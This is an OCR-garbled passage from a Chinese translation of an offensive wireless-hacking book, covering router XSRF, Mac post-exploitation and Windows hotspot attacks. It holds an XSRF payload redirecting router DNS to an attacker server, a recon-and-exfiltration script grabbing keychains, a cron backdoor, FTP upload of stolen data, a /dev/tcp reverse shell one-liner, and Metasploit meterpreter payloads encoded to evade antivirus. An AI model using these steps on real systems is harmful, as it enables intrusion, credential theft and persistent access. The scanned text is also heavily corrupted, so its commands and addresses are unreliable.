假设 用 户 保持 默认 设置 ， 那 么 他 的 路 由 器 将 在 192.168.1.1， 用 户 名 和 密码 将 是 linksysw 人 admin。 如 果 我 们 能 找到 浏览 器 来 呈 
现 像 下 面 这 样 的 一 个 页 面 ， 考 虑 会 友 生 什么 : 


<img src = http://linksys:admin@192.168.1.1/apply.cgi 
wan dns0 0=my&wan dns0 l=evilég& 
Wan dns0 2=server> [url| snortened or space) 


因此 ， 浏 览 器 会 指示 路 由 器 改变 它 的 DNS 设 置 。 这 种 类 型 的 漏洞 称 为 跨 站 点 请 求 伪造 (Cross Site Request 
Forgery, XSRF) 。 


当然 ， 以 前 的 链接 做 了 很 多 的 假设 。 它 仅 在 一 个 模型 上 工作 (或 者 几 个 非常 相似 的 模型 ) 。 如 果 用 户 没 有 改变 路 由 器 的 IP， 
已 才能 工作 。 因 为 我 们 可 以 猜测 密码 放 在 URL， 所 以 它 只 能 工作 。 
为 了 使 攻击 更 强大 ， 我 们 需要 说 明 几 个 不 足 乙 处 。 虽 然 它 看 起 来 像 是 用 户 可 以 为 目 己 指定 任何 IP 子 网 ， 但 事实 上 ， 他 将 有 一 


个 私有 的 IP 空 间 ， 因 此 大 大 限制 了 泡 围 。 他 还 将 设置 最 后 一 个 字 忆 为 .1、.2， 或 .254， 因 为 这 是 每 个 人 怎么 完成 它 的 原因 。 利 用 
字典 ,我 们 可 以 说 明 不 同 的 密码 。 将 要 完成 它 的 一 个 脚本 包含 在 本 书 的 配套 网 站 中 。 肢 本 的 一 个 运行 例子 如 下 所 示 : 


1 evil.dns.server.ip good.dns.server.ip /path/to/dict 


在 下 面 的 例子 中 ， 一 台 通 过 因特网 可 访问 的 主机 在 我 们 的 控制 下 ， 当 做 引 恶 的 DNS 服 务 器 和 一 个 正常 的 4.2.2.2 节 的 DNS 服 
务 器 。 通 过 指定 一 个 主要 的 和 次 要 的 DNS， 我 们 获得 想 要 的 属性 ， 即 如 果 我 们 把 绑 恶 的 DNS 服 务 器 拆散 ， 客 尸 端 将 退回 到 次 要 
的 服务 器 ， 并 且 它 们 的 因特网 将 继续 工作 。 


[~] 与 .A/gen—linksys-xsrf.Bl 128.177.27.241 4.2.2.2 ./dict 3 coutput.html 
LT 


Evil Dns: 1l28.111.21.241 


[~] Scat output.html |wc -1 
3143 


这 种 迭代 脚本 创建 一 个 与 3143 链 接 的 out.html 文 件 。 下 面 的 代码 段 显示 了 一 个 这 样 的 链接 。 


提示 当 你 利用 这 次 攻击 中 的 一 个 字典 时 ， 你 基本 上 正在 交替 使 用 密码 的 IP 空 间 。 我 们 推荐 使 用 一 个 非常 小 的 字典 ， 这 样 ， 
浏览 器 不 会 不 堪 重 负 。 如 果 你 有 超过 1 万 个 链接 ， 那 么 浏览 器 可 能 会 减 慢 太 多 以 至 于 没 法 使 用 。 


<1mg ne 168.1.1/apply.cgi?pptp dhcp=0&submit button 
1nd | submit type=&taction=Apply&tnow proto=dhcp 


sdaylight time=l&lan ipaddr=d&wait time+=Vtneed reboot=0&tdhcp check=& 

lan netmask 0=&lan netmask lJ]=&tlan netmask 2=&lan netmask 3=& 

wan proto=dhcp&twan hostname=&wan doma+in=&tmtu enable=V&lan ipaddr 0=192& 
lan ipaddr 1=l68&lan ipaddr 2=l&lan ipaddr 3=l&lan netmask=255.2595.2595.128& 
lan proto=dhcp&tdhcp stt+art=]O00&tdhcp num=o0tdhcp lease=U&wan dns=4¢& 

wan dns0 0=l28g&wan cdnsu = i/ ig&wan dns0 2=2 i/&wan dns0 3=241& 


wan dnsl] UVU=4&wan dnsl l=3&wan cnsl 2=z2&wan dnsl 3=l&wan dns2 0=0& 
wan dnsz2 1=0&wan dnsz2 2=0&wan dnsz2 3=0&wan wins=A4gwan wins 0=O0&gwan wins 1=0 


&wan Wlins 2=0&wan 0 Bl& daylight time=1" 
height="0" width="0" alt=""»> 


XSRF 攻 击 中 的 下 一 步 是 让 尽 可 能 多 的 人 访问 脚本 所 产生 的 output.html。 目 前 ， 我 们 只 是 认为 你 可 以 在 一 个 论坛 上 张贴 一 
个 它 的 链接 ， 邮 寄 给 某 人 ，XSS 一 个 WordPress 博 客 等 。 


提示 ”发动 这 种 攻击 时 ， 用 户 可 以 得 到 WRT160N 框 的 一 个 输入 密码 。 虽 然 不 幸 的 是 ， 浏 览 器 会 通知 用 户 ，HTTP 请 求 将 仍然 
会 在 后 台 执 行 。 对 话 框 是 无 效 的 窗 码 。 


一 旦 你 找到 一 个 访问 已 生成 HTML 的 客户 端 ，AP 将 改变 其 DNS 设 置 并 重启 。 客 户 端 将 最 有 可 能 被 暂时 断 开 ， 然 后 重新 加 
入 ， 并 得 到 一 个 新 的 DHCP 租 约 。 此 时 ， 你 的 DNS 设 置 将 推 给 他 们 。 这 将 是 一 个 设立 恶意 DNS 服 务 器 的 时 机 。 一 旦 你 达到 了 这 
步 ， 那 么 你 可 以 遵循 指示 ， 利 用 DHCP 设 置 一 个 恶意 DNS 服务 器 ; 只 要 适当 地 改变 LHOST 和 AUTOPWN 主 机 的 值 。 


人 @ 让 逢 XSRF 攻 击 


许多 不 可 思议 的 人 们 为 自己 的 家 庭 配 置 路 由 器 ， 他 们 会 启用 WPA， 但 遗忘 路 由 器 上 的 默认 设置 (包括 密码 ) 。 他 们 的 思维 
是 : “任何 人 想 要 登录 必须 首先 打开 WPA 密 钥 。” 前 面 的 攻击 说 明了 这 种 想法 是 多 么 不 上 正确。 保护 上 自己 免 于 这 种 类 型 攻击 的 关 
键 是 要 改变 默认 密码 


5.8 ”本 音 小 结 


本 草 同 你 呈现 了 许多 在 802.11 客 尸 端 上 执行 代码 的 实践 技术 。 如 果 可 以 从 应 对 措施 章节 看 出 任何 主要 的 主题 ， 除 非 你 确实 
需要 无 线 网 络 ， 人 否则 应 该 让 你 的 无 绪 网 络 断 网 ， 而 且 永 远 不 要 连接 到 一 个 开放 的 网 络 。 一 旦 你 已 获得 在 客户 山上 执行 代码 ， 如 果 
你 友 现 目 己 想 知 道 做 什么 ， 续 阅 读 。 接 下 来 的 两 草 只 专注 于 在 Mac 或 PC 上 用 执行 代码 做 什么 。 


最 后 ， 在 继续 到 下 一 草 之 前 ， 提 供 一 些 为 改进 当前 工具 的 想法 : 


在 使 用 Karmetasploit 时 ， 如 果 你 成 功 地 转发 了 大 多 数 HTTP 连 接 并 只 干预 ， 比 如 说 ， 每 10 个 中 的 1 个 ， 而 非 攻 击 每 一 个 
HTTP 连 接 ， 那 么 你 可 以 明显 减少 关注 。 这 样 做 将 需要 你 有 一 个 现 有 的 到 因特网 的 路 由 (EVDO 网 卡 或 其 他 无 线 网 络 会 做 到 ) ， 
并 且 对 captute_http 模 块 做 一 些 修 改 。 一 旦 你 得 到 它 的 代码 执行 ， 如 果 你 退出 攻击 某 个 客户 端 ， 那 么 奖励 积分 。 


. 本 章 利 用 的 ISC DHCP 服 务 器 似乎 大 部 分 时 间 赢 得 了 DHCP 比 赛 。 如 果 你 发 现 自己 遇 到 麻烦 ， 那 么 你 可 能 需要 探究 如 何 使 
它 响 应 速度 更 快 ， 或 编写 一 个 针对 黑客 的 非常 优化 的 程序 。 


.本章 中 出 现 的 XSRF 技 术 不 使 用 JavaSctipt 或 Java 来 发 起 攻击 。 意味 着 它 在 大 多 数 功 能 不 完善 的 浏览 器 上 运行 。 如 果 你 愿意 
使 用 这 两 种 技术 ， 你 可 以 利用 Java 类 (在 http://www.reglos.de/myaddress/MyAddress.html) 来 攻击 客户 端的 内 部 网 关 地 址 。 如 果 你 
不 担心 下 载 一 个 Java 类 来 执行 攻击 ， 这 样 可 以 更 快 ， 前 提 是 当 客 户 端的 网 络 使 用 一 个 不 太 可 靠 的 子 网 时 。 


第 6 章 ”专项 解 吕 : 在 OS X 上 以 桥 过 隐 


本 草 详细 介绍 如 何 针对 OS X 的 对 话 框 友 动 客户 端 攻击 ， 以 便 尽 可 能 多 地 获得 802.11 网 络 信息 ， 并 且 最 终 从 弹出 框 的 远程 网 
络 中 捕获 802.11 握 手 。 其 目标 是 通过 完整 的 步骤 ， 从 头 至 尾 详 细 展 示 如 何 利用 对 对 话 框 的 控制 ， 在 802.11 网 络 上 获得 访问 附近 
其 他 人 的 权限 。 本 章 的 结尾 ， 针 对 已 遍布 了 大 半 个 世界 的 WPA-PSK 网 络 ， 你 将 能 够 对 其 友 起 一 次 的 字典 攻击 。 


6.1 -制作 战 计划 


在 弹出 一 个 攻击 对 话 框 之 前 ， 我 们 需要 先 制订 一 个 计划 ， 即 一 旦 攻击 成 功 后 ， 需 要 在 上 面 安装 点 什么 。 首先， 需要 一 种 维持 
访问 的 方式 ， 即 在 攻击 过 程 中 ， 一 旦 我 们 丢失 了 最 初 的 shell 连 接 ， 我 们 仍 可 以 利用 一 个 简单 的 cron 作 业 来 创建 一 个 反 向 连接 
(connect-back) 的 shell。 另 外 ， 我 们 也 将 在 监控 模式 下 ， 在 受害 者 的 主机 上 捕捉 数据 包 。 在 Mac OS X 10.5L1 上 ,我 们 可 以 
用 kismet server 的 二 进 制 版 本 实现 ; 在 Mac OS X 10.6 上 ， 我 们 可 以 用 与 已 安装 的 airport 系 统 工具 实现 。 我 们 也 想 准备 一 套 快 
速 recon 脚 本 (recon.sh) ， 该 脚本 可 以 从 受害 者 的 主机 中 找 有 用 的 数据 。 所 有 这 些 工具 应 当 打 包 好 ， 并 经 过 事先 的 测试 (需要 
通过 当前 对 话 框 ， 在 一 个 业余 水 平 的 菜鸟 主机 所 上 ， 进 行 严 格 的 测试 ) 。 


最 后 但 并 非 最 不 重要 的 是 ， 我 们 还 需要 一 个 对 方 主 机 上 的 漏洞 。 本 书 中 ， 我 们 将 使 用 一 个 Java 反 序列 化 的 bug。 访 bug 在 目 
然 环境 下 已 具有 相当 长 的 保质 期 ， 未 打 补 丁 的 系统 是 100% 可 用 。 我 们 将 修改 由 Landon Fuller 公 司 公 开 提 供 的 概念 证 明 
(Proof-of-Concept，PoC) 程序 ， 并 作为 我 们 实施 一 个 反 向 连接 shell 的 工具 。 关 于 这 一 特定 漏洞 的 更 多 信息 ， 可 以 在 网 站 
http://www.milw0rm.com/exploits/8753 或 者 通过 谷歌 搜索 CVE-2008-5353 找 到 |。 


我 们 要 利用 多 个 不 同 的 主机 作为 这 次 攻击 的 一 部 分 ， 这 包括 : 带 有 Apple Xcode 开发 工具 的 主机 ， 一 个 用 于 攻击 中 转 的 


Web 网 络 主机 ， 以 及 一 个 受害 者 的 主机 。 如 果 可 能 的 话 ， 你 可 能 还 想 使 用 另 一 全 Mac 来 测试 一 下 这 个 攻击 方式 。 本 章 的 最 终 目 

标 是 通过 客户 闯 浏 览 器 的 漏洞 得 到 一 个 主机 的 root 管 理 员 权 限 ， 从 而 找到 附近 的 无 线 网 络 (该 网 络 的 网 络 名 为 

JUICY_ WPA_NETWORK) ， 进 而 破解 其 加 密 系统 ， 最 后 用 它 来 寻找 更 多 的 可 供 攻击 的 主机 。 这 一 操作 的 示意 图 ， 如 图 6-1 所 
左 侧 的 主机 处 于 攻击 者 的 直接 控制 之 下 ， 目 标 主机 通过 以 太 网 连接 到 因 特 了 网， 无线 网 络 访问 JUICY_WPA_NETWORK 只 是 

标 主 机 可 访问 范围 内 的 另 一 个 网 络 ， 目 标 主 机 未 将 乙 连 入 到 因特网 上 ， 所 以 目前 还 不 能 直接 访问 。 


JUICY WPA NEIWORE 


Web 主 机 


(802.1l1mercenary.net) 


准备 攻击 的 主机 
图 6-1 目标 网 络 和 攻击 者 的 主机 
[1] ”Apple 计 算 机 操作 系统 OS  X 的 子 版 本 号 中 ，10.0 以 上 都 以 大 型 猫 科 动 物 命名 ， 如 10.0 为 猫 鹏 (Cheetah) ，10.1 为 美洲 狮 
(Puma) ，10.2 为 美洲 虎 (Jaguar) ，10.3 为 黑 药 (Panther) ，10.4 为 老虎 (Tiger) ，10.5 为 豹子 ne 10.6 为 雪 鹏 《Snow 
Leopard) ，10.7 为 狮子 (Lion) ， 并 且 已 经 注册 了 山猫 (Lynx) 和 单 色 美洲 译 者 注 
2] 和 平时 的 理解 相反 ， 相 比 于 高 手 ， 菜 鸟 的 主机 虽然 安全 性 很 差 ， 但 在 菜鸟 的 电脑 上 ， 常 常会 出 现 缺 东 少 西 、 配 置 错乱 等 现 
译 者 注 


6.2 ”让 大 多 数 用 户 级 代码 能 够 执行 


如 果 你 已 跟随 了 这 么 远 ， 那 么 你 应 该 位 于 受害 者 的 OS X 对 话 框 的 远程 shell 上 。 我 们 马上 要 做 的 第 一 件 事 是 ， 下 载 我 们 之 前 
打 过 包 的 tarball: 


connect to ag .4|] freoem pool 13-13-1062-116.washdcec.f1ios. 
Verlizon .net [1713.1713.162.1/16|] 49460 

id 

ulid=201 (Jradowlicz) i1d=20 (staff) 


Jpadmin).,81( appserveradm), 


) 本 
roups 28 因 tafty..d8n 
lV0l(com.apple.sharepoint .group.1), 19( appserverusr),80 (admin) 
Cd ~ 
pwd 


/Users/ijradowicz 


uname -a 
Darwin ohnycshs-macbhook-pro-2z2.1local 9.8.0 Darwin Kernel Version 9.8.0: 
Wed Jul 15 16:55:01 PPT 2009;: root:xnu-1228.15.4~1,/RELEASE I386 


mkdir .hidden 
cd -hidden 


curl] -0o osx package.tar.gz 
http://www.802.1lmercenary.net/~johnycsh/osx package.tar.gz 


a 


多 Total 证 Receljved Rierd Average Speed Time 


现在 我 们 必须 运行 已 准备 好 的 脚本 : 


tar ZXVvf s/osx packagetar.gz 
cd osx package 
. /runme.sh 
running the recon script 
. /outbound data/ 
outbound data/airport .txt 
/outbound data/defaults.txt 
/outbound data/host.txt 
./outbound data/login.keychain 
. /outbound data/nettxt 
/outbound data/ps.txt 
/outbound data/shadow.tar 
/outbound data/users.txt 
./outbound data/w.txt 
"Recon complete. Tarball is located in /tmp/outbound data.tar.bz2" 
Copvying the cronjob script into ~/Library/AppSupport/CrashReporter/ 
Starting the cron Job 


这 些 好 消息 很 显然 是 我 们 所 希望 的 ， 并 且 是 合理 的 。 因 为 我 们 不 是 root， 所 以 抓 取 shadow 文 件 失 败 ， 但 其 他 的 方面 ,一 切 
工作 良好 。 让 我 们 仔细 检查 ， 我 们 的 后 门 正在 运行 ， 然 后 关闭 对 话 框 的 recon 数 据 : 
crontab —1 


*/ 15 * 太太 mw/Library/Application\ Support/CrashReporter/CrashReporter.sh 


看 起 来 很 不 错 。 之 前 用 最 明显 的 万 式 复 制 的 tarball， 现 在 将 进入 下 面 的 状态 : 


scp /tmp/outbound data.tar.gz johnycsh@802.1limercenary.net:/home/johnycsh/ 


然而 ， 你 却 会 看 到 这 个 令 人 费解 的 错误 : 


Permlssion denijed, please try again. 


lost connection 
不 是 调试 (可 能 有 一 些 做 的 不 是 很 健壮 的 东西 在 $4PATH 中 ， 但 谁 知道 是 不 是 这 样 呢 ) ， 让 我 们 通过 FTP 删 除 它 


ftp Johnycsh@802.1]lmercenary.net 
Password: notA4ul!! 

put outbound data.tar.bzs 
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全 买 工 七 
最 后 ， 我 们 删除 我 们 外 出 tarball: 


rm outbound data,tar.bz- 


好 了 。 任 务 完 成 了 。 对 话 框 弹出 来 了 ，recon 也 完成 了 ， 后 门 也 处 于 工作 中 。 如 果 我 们 需要 ， 我 们 可 以 在 以 后 再 柄 理 recon 
数据 ， 现 在 的 时 间 是 在 这 个 对 话 框 的 范围 内 ， 尽 可 能 多 地 学 习 关 于 802.11 网 络 的 知识 。 


双 保 险 的 shell 


当 用 原始 ITCP 连 接 来 操作 一 个 远程 shell 的 时 候 ， 如 果 不 能 在 进程 中 进行 控制 〈 控 制 命令 诸如 Ctl+C 和 Ctrl+Z 等 ) ， 那 么 你 有 
没有 发 现 这 是 件 很 令 人 肖 表 的 事情 ?你 有 没有 发 现 你 意外 地 关 掉 了 初始 shell， 然 后 不 得 不 等 候 大 约 15 分 钟 再 重新 运行 ? 对 于 这 些 
困扰 ， 你 不 是 唯一 的 一 个 。 幸 运 的 是 ， 有 一 个 简单 的 解决 方法 可 以 使 用 ， 你 可 以 让 初始 的 shell 产 生 更 多 反 向 连接 的 shell， 然 后 配 
置 相应 的 netcat 监 听 器 ， 这 样 在 你 得 到 你 初始 化 shel 的 反 向 连接 时 ， 运 行 以 下 程序 : 


/bin/bash -C “exec /bin/sh 0O</dev/tcp/LISTENING HOSTS/9090 1>&0 2>&0 &” 


我 称 这 种 技术 为 双 保 险 的 shell (double-fisting shell) ， 它 可 以 节省 用 于 等 待 的 起 坎 的 15 分 钟 。 


6.3 “本章 小 结 
最 终 ， 我 们 展示 了 使 用 别人 的 Mac 电 脑 上 破解 无 线 网 络 的 过 程 。 虽 然 我 们 已 经 介绍 了 许多 本 地 OS X Wi-Fi 的 黑客 技术 ， 但 
我 们 所 讨论 的 决 不 是 此 类 黑客 技术 的 全 部 内 容 。 这 里 提供 了 一 个 供 高 级 读者 练 手 的 兴趣 列表 : 
` 使 用 aitpott-i 命 令 创建 一 个 骗子 ad-hoc 网 络 ， 并 命名 为 奖励 积分 的 公共 免费 无 线 网 络 。 
. 作为 troot 用 户 ， 运 行 defaults read blued。 如 果 你 们 的 物理 距离 很 近 ， 可 以 使 用 链 路 密 钥 来 认证 该 用 户 的 蓝牙 设备 。 


: 建立 一 个 到 受害 者 主机 的 VPN 连 接 ， 通 过 它 ， 从 一 个 全 副 武 器 的 Linux 对 话 框 中 ， 通 过 因特网 实施 路 由 攻击 。 我 们 建议 使 
用 OpenVPN。 通 过 使 用 这 种 技术 ， 你 不 需要 担心 在 受害 者 主机 的 系统 上 ， 用 带 有 一 个 大 大 水 印 的 软件 去 配置 自己 的 操作 。 


` 在 远程 网 络 上 上 传 和 使 用 Ettetcap 到 MITM 的 客户 端 。 黑 客 目 前 花 相 当 多 的 工作 在 OS X 上 进行 编译 。 检 查 技 巧 提 示 的 在 线 


第 7/ 草 ”专项 解说 : 在 Windows 上 架 桥 过 了 


在 推出 Windows Vista 的 时 候 ，Microsoft 公 司 针 对 无 绕 网 络 的 模式 做 了 重大 改变 ， 这 些 改变 主要 体现 在 两 点 ， 一 是 通过 对 
网 络 驱 动 程序 接口 规范 (Network Driver Interface Specification，NDIS) 6.0 模 型 的 设计 ; 二 是 本 地 Wi-Fi 接 口 的 设计 。 二 者 
共同 取代 了 原 有 的 古板 和 缺乏 特色 的 Windows XP 无 线 接口 。Windows Vista 客 户 端 在 无 线 协 议 集 里 具有 新 的 灵活 性 ， 人 允许 新 的 
应 用 程序 、 安 全 模式 ， 以 及 比 以 前 的 版 本 能 更 好 地 访问 无 线 服务 。 


这 种 新 的 访问 方式 也 赋予 攻击 者 一 种 能 力 ， 该 能 力 允 许 从 命令 行 或 图 形 用 户 界 面 将 无 绪 协 议 的 使 用 用 之 于 恶意 的 目的 ， 进 而 
攻击 附近 的 其 他 网 络 。 在 第 6 章 中 ， 我 们 实践 了 一 个 攻击 者 利用 OS X 系 统 的 客户 端 ， 获 得 一 个 shell， 使 用 本 地 无 线 网 卡 攻击 附近 
的 无 线 网 络 和 客 尸 端的 攻击 能 力 。 其 中 有 一 个 概念 ， 我 们 称 为 : 染 桥 过 隐 (bridging the airgap) 。 在 本 章 中 ， 我 们 将 研究 一 
些 从 攻击 者 的 角度 来 看 Windows Vista 和 Windows 7 本 地 Wi-Fi 接 口 的 功能 ， 利 用 这 些 功能 去 攻击 位 于 跨越 了 大 半 个 地 球 的 另 一 


个 远 端 的 网 络 。 


像 第 6 章 一 样 ， 本 章 将 使 用 说 明 格 式 ， 带 你 穿越 终端 到 终端 的 攻击 过 程 ， 从 准备 和 侦察 到 占领 一 个 无 线 客户 端 ， 然 后 再 到 攻 
击 远 端的 无 线 网 络 。 在 这 种 情况 下 ， 我 们 将 突出 一 个 常见 的 攻击 线路 ， 在 该 线路 上 ， 攻 击 者 会 在 安全 处 于 薄弱 的 时 候 使 用 客户 
映 ， 然 后 当 受 害 者 返回 目标 网 络 的 时 候 ， 利 用 受害 者 的 客 尸 端 做 进一步 的 访问 。 


7.1 攻击 场景 


| 


无 线 热 点 (hotspot) 的 环境 为 我 们 攻击 客 尸 端 系 统 提供 了 一 个 很 好 的 机 会 。 通 过 使 用 诸如 AirPWN 这 样 的 工具 可 以 操纵 
Web 浏 览 嚣 的 活动 ， 进 而 可 以 窃听 到 很 多 敏感 的 内 容 (如 未 保护 的 电子 邮件 和 其 他 网 络 活动 ， 再 如 冒充 网 络 的 服务 ) 。 忆 之 ， 
攻击 者 对 被 破解 的 客 尸 端 系 统 有 多 项 选择 可 以 使 用 。 


热点 攻击 可 以 投机 取 I5， 例 如 ， 攻击 者 可 以 操纵 所 有 有 漏洞 的 客 尸 加 入 到 僵尸 爱好 者 所 在 的 网 络 ， 或 者 有 针对 性 的 攻击 。 针 
对 一 个 具体 的 目标 ，Google Maps 可 以 准确 地 实施 定位 ， 如 某 个 热点 束 是 那个 中 午 用 和 餐 时 间 员 工 经 常 光 顾 的 餐饮 。 结 合 上 述 执 
点 知识 ， 可 以 先 从 目标 中 指定 要 攻击 的 目标 用 户 ， 然 后 组 建 一 个 商店 ， 诱 惑 被 锁定 的 用 户 来 这 里 并 使 用 这 个 系统 。 


对 于 一 个 攻击 者 来 讽 ， 在 无 绪 热 点 环境 中 有 很 多 机 会 ， 这 举 广 为 流 行 的 万 式 饥 布 于 每 个 大 都 市 中 。 在 下 面 的 攻击 例子 中 ， 我 
们 将 摘 述 一 个 虚构 的 攻击 目标 ， 名 叫 竹 类 食品 (Potage Foods) ， 是 一 家 餐馆 热点 环境 ， 设 餐馆 给 客户 提供 免费 Wi-Fi 服 务 ， 


所 使 用 的 SSID 是 “POTAGE” 。 


在 这 个 攻击 中 ， 我 们 将 演示 如 何 破 坏 无 线 客 尸 端 系 统 去 执行 恶意 的 可 执行 文件 ， 并 授权 我 们 访问 客 尸 端 系 统 。 当 客户 返回 到 
他 的 家 庭 网 络 时 ， 我 们 将 通过 以 桥 过 隐 的 方式 远程 访问 他 的 系统 ， 利 用 Windows Vista 或 Windows 7 的 客 尸 端 访 问 一 个 远程 无 
线 网 络 。 


7.2 ”为 攻击 做 准备 


在 这 个 区 域内 确定 攻击 受害 者 系统 的 热点 位 置 后 ， 我 们 建立 友 动 攻击 的 基础 设施 ， 如 图 7-1 所 示 。 在 这 里 ， 我 们 将 在 热点 环 
境 中 确定 一 个 受害 者 系统 ， 在 进行 远程 访问 进程 前 ， 我 们 先 等 待 锁 定 的 这 人 台 主 机 系统 返回 他 目 己 的 公司 网 络 环境 ， 因 为 这 样 做 等 
于 授予 我 们 访问 其 公司 内 部 网 络 和 该 网 络 附近 资源 的 权力 。 


SSID: “corp™ 


用 sushi 方 法 攻击 


『 


714.208.19.32 


Internet 


图 7-1 我 们 的 目标 和 配套 的 网 络 环境 


作为 远程 访问 的 一 种 方法 ， 我 们 将 利用 Metasploit meterpreter 有 效 载 傈 机 制 ， 通 过 手动 或 自动 交互 来 实现 。meterpreter 
有 效 载 位 会 让 攻击 者 在 被 破坏 主机 上 显示 出 巨大 威力 ， 如 : 访问 文件 系统 、 注 册 表 、shell 命 令 、 系 统 进 程 等 。 在 我 们 的 Hack 
Server (黑客 服务 器 ) 平台 上 ， 我 们 将 启动 Metasploit msfconsole 工 具 ， 并 启动 meterpreter 处 理 程序 ， 如 下 所 示 。 


提示 ”如 何 让 Metasploit 运 行 以 及 如 何在 你 的 系统 上 运行 ， 请 参阅 第 6 章 。 


cd mstf3 


. /msfcon 


凸 
es 
S sole 


=[ msf v3.3-dev [core:3.3 api:1.0| 
+ -—— 一 -=[ 405 exploits —- 248 payloads 
+ 一 一 一 -= 21] encoders 一 8 nops 

189 aux 

msf > use multi/handler 
msft exploit (handler) > set PAYLOAD windows/meterpreter/reverse tcp 
PAYLOAD => windows/meter i eVeTSe 七 CP 
mSd exploit (handler) > set LHOST /4.208.]19.32 
LHOST => 714.208.19.32 
mstit exploit (handler) > set LPORT 8080 
LPORT => 8080 
msft exploit (handler) > exploit 


[*] Handler binding to LHOST 0.0.0.0 
[*] started reverse handler 


Starting 七 he pavyload handler... 


新 命令 。 


在 整个 攻击 期 间 ， 我 们 都 把 这 


， 把 可 执行 文件 重新 以 另 一 种 形式 编码 ， 从 而 避免 反 


当 meterpreter 客 户 端 连接 到 系统 后 ，msfconsole 提 示 符 又 显示 在 最 后 一 个 行 等 从 
个 进程 放 在 一 边 ， 让 它 处 于 运行 状态 即 可 。 

下 一 步 ， 我 们 将 创建 meterpreter 客 户 问 中 要 友 送 的 有 效 载 何 ， 这 些 内 容 将 来 会 友 送 给 受害 者 的 主机 。 由 于 许多 反 病 毒 软件 
会 把 meterpreter 客 户 闹 识别 为 恶意 软件 ， 因 此 我 们 需要 执行 一 些 额外 步 


病毒 软件 的 检测 。 


msfencode 工 具 人 允许 我 们 在 多 种 编码 机 制 中 挑选 其 中 之 一 作为 应 用 。 


需要 注意 的 是 : 当 某 个 可 执行 文件 以 一 种 编码 格式 保 


存 是 可 以 的 ， 但 当 该 可 执行 文件 需要 执行 的 时 候 ， 则 需要 将 保存 的 内 容 解 码 还 原 成 原始 的 可 执行 文件 (1]。 在 x86 架 构 的 主机 上 ， 


编码 方法 Shikata Ga Nai (日 语 ， 


一 ， 它 利用 一 个 多 仿 的 、 将 动态 指令 序列 与 动态 选择 处 理 器 寄存 器 进 


意思 是 “ 它 不 可 能 被 帮助 ”或 者 “对 它 没有 什么 可 以 做 ”) 被 认为 是 可 用 的 最 好 编码 机 制 之 
行 逻辑 异 或 (XOR) 的 编码 机 制 。 在 下 面 的 例子 


中 ，msfpayload 工 具 用 于 创建 有 效 载 集 ， 然 后 将 原始 数据 输出 (以 字母 R 结 尾 ) 到 msfencode 工 具 作 为 输入 。msfencode 使 用 
带 有 4 种 编码 的 Shikata Ga Nai 盾 充 有 效 载荷 ， 并 且 生 产 一 个 名 为 setup.exe 的 可 执行 文件 。 


willhackforsushi $s 
中 


. /msfpayload windows/meterpreter/reverse tcp 


LHOST=14.208.19.32 LPORT=8080 及 /msfencode -~e x86/shikata ga nai 
-CC 4 一 七 exe 一 口 Setup.exe 

[*] x86/shikata ga nai succeeded with size 300 (iteration=]) 

[*] X86/shikata ga nai succeeded with size 327 (iteration=2) 

[*] x86/shikata ga nai succeeded with size 354 (iteration=3) 

[*] x86/shikata ga nai succeeded with size 38 (lteration=4) 


下 一 步 ,， 我们 将 setup.exe 文 件 上 传 到 服务 器 托管 的 Web 服 务 器 上 : 


willhackforsushi $s 3eEtup .exe 


/var/Wwww/Ssetup.exe 


随 着 完成 用 于 攻击 的 基础 设施 组 件 ， 我 们 已 经 准备 赶 到 将 要 友 动 攻击 的 热点 位 置 了 。 


[1] 这 类 似 于 压缩 程序 ， 当 压缩 一 个 可 执行 文件 后 ， 被 压缩 的 文件 可 以 存放 、 和 复制、 传送, 但 是 不 能 执行 原 程序 的 功能 ， 只 有 解 
压缩 后 ， 恢 复 成 原始 的 可 执行 文件 了 ， 这 个 可 执行 文件 才能 恢复 可 执行 的 功能 。 译 者 注 


7.3 ”本 地 无 线 侦察 


用 meterpreter 工 具 访 问 受害 者 系统 ， 我 们 可 以 启动 一 个 命令 shell 来 开始 我 们 的 无 线 侦察 。 在 这 一 步 ， 我 们 将 列举 与 受害 者 
主机 的 无 线 协议 堆栈 有 关 的 配置 信息 ， 以 及 其 他 有 关 的 细节 信息 。 继 而 确定 哪些 无 线 接口 是 可 用 的 ， 如 何 使 用 这 些 接口 ， 首 选 网 
络 的 配置 ， 从 受害 者 主机 上 能 找到 的 敏感 配置 细节 等 。 首 先 ， 我 们 将 启动 cmd.exe 进 程 获得 对 shell 的 访问 ， 并 对 任何 可 能 处 于 
控制 台 的 用 户 隐藏 该 进程 


meterpreter > execute -H -ti cmd.exe 一 工 

Process T7500 created. 

Channel 1] created. 

Microsoft Windows [Yersion 6.0.6001] 

COopPpYyI1ight (cc} 2006 Microsoft Corporation. All rights reserved. 


C:\Windows \system32>cd\ 


注意 ”meterpretet 产 生 的 cmd.exe shell 程 序 会 回 显 所 有 控制 台 命令 两 次 。 为 了 清楚 起 见 ， 下 面 的 例子 中 我 们 省 略 了 这 些 命令 。 


在 我 们 开始 利用 受害 者 主机 的 无 线 接 口 攻 击 其 他 网 络 之 前 ， 我 们 要 找 出 这 个 接口 究竟 是 如 何 使 用 的 ， 以 及 它 的 当前 配置 。 最 
好 的 情况 是 发 现 受 害 者 系统 正在 使 用 的 是 它们 的 有 线 接口 进行 当前 的 连接 ， 且 有 一 个 可 用 但 却 没有 使 用 的 无 线 接口 。 我 们 可 以 判 
断 连接 接口 的 状态 ， 并 通过 Windows 的 ipconfig 命 令 知道 它们 是 如 何 使 用 的 : 


CN TILidy 


Windows IP Confijguration 


i 


Wireless LAN adapter Wireless Network Connection: 


Media State .Media disconnected 
二 


Ethernet adapter Local Area Connection: 


Connection—speciftic DNS Suffix 


Link—local IPv6é Address . . . . . : fe80::]5d9:f983c:6664:460810 
IPVv4 Address. i127.214.13.11 

Subnet Mask a eh a 

Default Gateway 12:214.13.1 


注意 木 章 所 使 用 的 命令 的 例子 ， 为 了 简单 明了 起 见 做 了 一 些 修改 ， 如 删除 了 多 余 的 回 车 换行 。 在 实际 使 用 这 些 命令 时 ， 你 
会 看 到 在 标题 和 数据 之 间 ， 会 有 很 多 额外 的 换行 ， 与 上 面 所 显示 的 内 容 咯 有 不 同 。 


在 这 个 例子 中 ， 你 可 以 看 到 无 线 局 域 网 适配器 处 于 连接 断 开 状态 ， 反 之 以 太 网 适配器 会 被 配置 一 个 |P 地 址 ， 这 襄 明 受害 者 主 
机 是 在 有 一 个 未 使 用 的 无 线 接口 的 情况 下 ， 通 过 以 太 网 接口 连接 到 网 络 。 


我 们 可 以 使 用 netsh 命 令 收 集 无 线 接口 的 更 多 信息 


C:\>netsh wlan show interfaces 
